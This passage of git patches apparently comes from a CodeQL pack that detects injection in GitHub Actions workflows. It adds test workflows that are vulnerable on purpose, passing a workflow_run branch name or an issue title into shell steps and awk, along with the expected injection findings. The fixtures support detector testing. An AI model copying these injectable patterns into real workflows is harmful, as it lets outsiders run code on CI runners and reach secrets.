echo "matrix_folders=$matrix_folders" >> $GITHUB_ENV + + - name: NVIDIA-SMI + run: | + nvidia-smi + + - name: Environment + working-directory: /transformers + run: | + python3 utils/print_env.py + + - name: Show installed libraries and their versions + working-directory: /transformers + run: pip freeze + + - name: Run all non-slow selected tests on GPU + working-directory: /transformers + run: | + python3 -m pytest -n 2 --dist=loadfile -v --make-reports=${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }} ${{ fromJson(needs.setup.outputs.test_map)[matrix.folders] }} + + - name: Failure short reports + if: ${{ failure() }} + continue-on-error: true + run: cat /transformers/reports/${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }}/failures_short.txt + + - name: "Test suite reports artifacts: ${{ matrix.machine_type }}_run_all_tests_gpu_${{ env.matrix_folders }}_test_reports" + if: ${{ always() }} + uses: actions/upload-artifact@v4 + with: + name: ${{ matrix.machine_type }}_run_all_tests_gpu_${{ env.matrix_folders }}_test_reports + path: /transformers/reports/${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }} + + run_tests_multi_gpu: + name: Model tests + needs: setup + # `dummy` means there is no test to run + if: contains(fromJson(needs.setup.outputs.matrix), 'dummy') != true + strategy: + fail-fast: false + matrix: + folders: ${{ fromJson(needs.setup.outputs.matrix) }} + machine_type: [multi-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, t4, push-ci] + container: + image: huggingface/transformers-all-latest-gpu-push-ci + options: --gpus all --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + steps: + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Reinstall transformers in edit mode (remove the one installed during docker image build) + working-directory: /transformers + run: python3 -m pip uninstall -y transformers && python3 -m pip install -e . + + - name: Echo folder ${{ matrix.folders }} + shell: bash + # For folders like `models/bert`, set an env. var. (`matrix_folders`) to `models_bert`, which will be used to + # set the artifact folder names (because the character `/` is not allowed). + run: | + echo "${{ matrix.folders }}" + echo "${{ fromJson(needs.setup.outputs.test_map)[matrix.folders] }}" + matrix_folders=${{ matrix.folders }} + matrix_folders=${matrix_folders/'models/'/'models_'} + echo "$matrix_folders" + echo "matrix_folders=$matrix_folders" >> $GITHUB_ENV + + - name: NVIDIA-SMI + run: | + nvidia-smi + + - name: Environment + working-directory: /transformers + run: | + python3 utils/print_env.py + + - name: Show installed libraries and their versions + working-directory: /transformers + run: pip freeze + + - name: Run all non-slow selected tests on GPU + env: + MKL_SERVICE_FORCE_INTEL: 1 + working-directory: /transformers + run: | + python3 -m pytest -n 2 --dist=loadfile -v --make-reports=${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }} ${{ fromJson(needs.setup.outputs.test_map)[matrix.folders] }} + + - name: Failure short reports + if: ${{ failure() }} + continue-on-error: true + run: cat /transformers/reports/${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }}/failures_short.txt + + - name: "Test suite reports artifacts: ${{ matrix.machine_type }}_run_all_tests_gpu_${{ env.matrix_folders }}_test_reports" + if: ${{ always() }} + uses: actions/upload-artifact@v4 + with: + name: ${{ matrix.machine_type }}_run_all_tests_gpu_${{ env.matrix_folders }}_test_reports + path: /transformers/reports/${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }} + + run_tests_torch_cuda_extensions_single_gpu: + name: Torch CUDA extension tests + needs: setup + if: contains(fromJson(needs.setup.outputs.matrix), 'deepspeed') || contains(fromJson(needs.setup.outputs.matrix), 'extended') + strategy: + fail-fast: false + matrix: + machine_type: [single-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, t4, push-ci] + container: + image: huggingface/transformers-pytorch-deepspeed-latest-gpu-push-ci + options: --gpus 0 --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + steps: + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /workspace/transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Reinstall transformers in edit mode (remove the one installed during docker image build) + working-directory: /workspace/transformers + run: python3 -m pip uninstall -y transformers && python3 -m pip install -e . + + - name: Remove cached torch extensions + run: rm -rf /github/home/.cache/torch_extensions/ + + # To avoid unknown test failures + - name: Pre build DeepSpeed *again* + working-directory: /workspace + run: | + python3 -m pip uninstall -y deepspeed + DS_BUILD_CPU_ADAM=1 DS_BUILD_FUSED_ADAM=1 python3 -m pip install deepspeed --global-option="build_ext" --global-option="-j8" --no-cache -v --disable-pip-version-check + + - name: NVIDIA-SMI + run: | + nvidia-smi + + - name: Environment + working-directory: /workspace/transformers + run: | + python utils/print_env.py + + - name: Show installed libraries and their versions + working-directory: /workspace/transformers + run: pip freeze + + - name: Run all non-slow selected tests on GPU + working-directory: /workspace/transformers + # TODO: Here we pass all tests in the 2 folders for simplicity. It's better to pass only the identified tests. + run: | + python -m pytest -n 1 --dist=loadfile -v --make-reports=${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports tests/deepspeed tests/extended + + - name: Failure short reports + if: ${{ failure() }} + continue-on-error: true + run: cat /workspace/transformers/reports/${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports/failures_short.txt + + - name: "Test suite reports artifacts: ${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports" + if: ${{ always() }} + uses: actions/upload-artifact@v4 + with: + name: ${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports + path: /workspace/transformers/reports/${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports + + run_tests_torch_cuda_extensions_multi_gpu: + name: Torch CUDA extension tests + needs: setup + if: contains(fromJson(needs.setup.outputs.matrix), 'deepspeed') || contains(fromJson(needs.setup.outputs.matrix), 'extended') + strategy: + fail-fast: false + matrix: + machine_type: [multi-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, t4, push-ci] + container: + image: huggingface/transformers-pytorch-deepspeed-latest-gpu-push-ci + options: --gpus all --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + steps: + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /workspace/transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Reinstall transformers in edit mode (remove the one installed during docker image build) + working-directory: /workspace/transformers + run: python3 -m pip uninstall -y transformers && python3 -m pip install -e . + + - name: Remove cached torch extensions + run: rm -rf /github/home/.cache/torch_extensions/ + + # To avoid unknown test failures + - name: Pre build DeepSpeed *again* + working-directory: /workspace + run: | + python3 -m pip uninstall -y deepspeed + DS_BUILD_CPU_ADAM=1 DS_BUILD_FUSED_ADAM=1 python3 -m pip install deepspeed --global-option="build_ext" --global-option="-j8" --no-cache -v --disable-pip-version-check + + - name: NVIDIA-SMI + run: | + nvidia-smi + + - name: Environment + working-directory: /workspace/transformers + run: | + python utils/print_env.py + + - name: Show installed libraries and their versions + working-directory: /workspace/transformers + run: pip freeze + + - name: Run all non-slow selected tests on GPU + working-directory: /workspace/transformers + # TODO: Here we pass all tests in the 2 folders for simplicity. It's better to pass only the identified tests. + run: | + python -m pytest -n 1 --dist=loadfile -v --make-reports=${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports tests/deepspeed tests/extended + + - name: Failure short reports + if: ${{ failure() }} + continue-on-error: true + run: cat /workspace/transformers/reports/${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports/failures_short.txt + + - name: "Test suite reports artifacts: ${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports" + if: ${{ always() }} + uses: actions/upload-artifact@v4 + with: + name: ${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports + path: /workspace/transformers/reports/${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports + + send_results: + name: Send results to webhook + runs-on: ubuntu-22.04 + if: always() + needs: [ + setup, + run_tests_single_gpu, + run_tests_multi_gpu, + run_tests_torch_cuda_extensions_single_gpu, + run_tests_torch_cuda_extensions_multi_gpu + ] + steps: + - name: Preliminary job status + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + echo "Setup status: ${{ needs.setup.result }}" + + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - uses: actions/checkout@v4 + # To avoid failure when multiple commits are merged into `main` in a short period of time. + # Checking out to an old commit beyond the fetch depth will get an error `fatal: reference is not a tree: ... + # (Only required for `workflow_run` event, where we get the latest HEAD on `main` instead of the event commit) + with: + fetch-depth: 20 + + - name: Update clone using environment variables + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - uses: actions/download-artifact@v4 + - name: Send message to Slack + env: + CI_SLACK_BOT_TOKEN: ${{ secrets.CI_SLACK_BOT_TOKEN }} + CI_SLACK_CHANNEL_ID: ${{ secrets.CI_SLACK_CHANNEL_ID }} + CI_SLACK_CHANNEL_ID_DAILY: ${{ secrets.CI_SLACK_CHANNEL_ID_DAILY }} + CI_SLACK_CHANNEL_DUMMY_TESTS: ${{ secrets.CI_SLACK_CHANNEL_DUMMY_TESTS }} + CI_SLACK_REPORT_CHANNEL_ID: ${{ secrets.CI_SLACK_CHANNEL_ID }} + ACCESS_REPO_INFO_TOKEN: ${{ secrets.ACCESS_REPO_INFO_TOKEN }} + CI_EVENT: push + CI_TITLE_PUSH: ${{ github.event.head_commit.message }} + CI_TITLE_WORKFLOW_RUN: ${{ github.event.workflow_run.head_commit.message }} + CI_SHA: ${{ env.CI_SHA }} + SETUP_STATUS: ${{ needs.setup.result }} + + # We pass `needs.setup.outputs.matrix` as the argument. A processing in `notification_service.py` to change + # `models/bert` to `models_bert` is required, as the artifact names use `_` instead of `/`. + run: | + pip install slack_sdk + pip show slack_sdk + python utils/notification_service.py "${{ needs.setup.outputs.matrix }}" diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 3330ad89311..3f2d9ebc2c9 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -272,6 +272,12 @@ nodes | .github/workflows/test9.yml:35:42:35:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/test9.yml:43:42:43:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | +| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index e325205d8c8..4de44d83635 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -272,6 +272,12 @@ nodes | .github/workflows/test9.yml:35:42:35:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/test9.yml:43:42:43:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | +| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -328,6 +334,12 @@ subpaths | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | +| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | From eb66114d8bf0d0bc5f273f1d2b8e70873a464c31 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 11:35:44 +0200 Subject: [PATCH 0399/1267] feat(models): New ArgInj sink --- ql/lib/ext/config/argument_injection_sinks.yml | 1 + .../Security/CWE-094/.github/workflows/arg_injection.yml | 5 +---- .../Security/CWE-094/ArgumentInjectionCritical.expected | 3 +++ .../Security/CWE-094/ArgumentInjectionMedium.expected | 2 ++ 4 files changed, 7 insertions(+), 4 deletions(-) diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/ql/lib/ext/config/argument_injection_sinks.yml index 727c982d2ec..4588af0bf00 100644 --- a/ql/lib/ext/config/argument_injection_sinks.yml +++ b/ql/lib/ext/config/argument_injection_sinks.yml @@ -4,5 +4,6 @@ extensions: extensible: argumentInjectionSinksDataModel # https://gtfobins.github.io/ data: + - ["(awk)(.*?)", 2, 3] - ["(sed)(.*?)", 2, 3] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml index 19435af16d3..0956aea61bd 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml @@ -14,7 +14,4 @@ jobs: - run: sed "s/FOO/$TITLE/g" - run: echo "foo" | sed "s/FOO/$TITLE/g" > bar - run: echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) - - - - + - run: awk "BEGIN {$TITLE}" diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected index 21483efe36c..13f4954eac3 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected @@ -2,13 +2,16 @@ edges | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | provenance | | nodes | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | +| .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | subpaths #select | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | sed | | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | sed | | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | +| .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | awk | diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected index c2ff2885a99..67f728705f4 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected @@ -2,10 +2,12 @@ edges | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | provenance | | nodes | 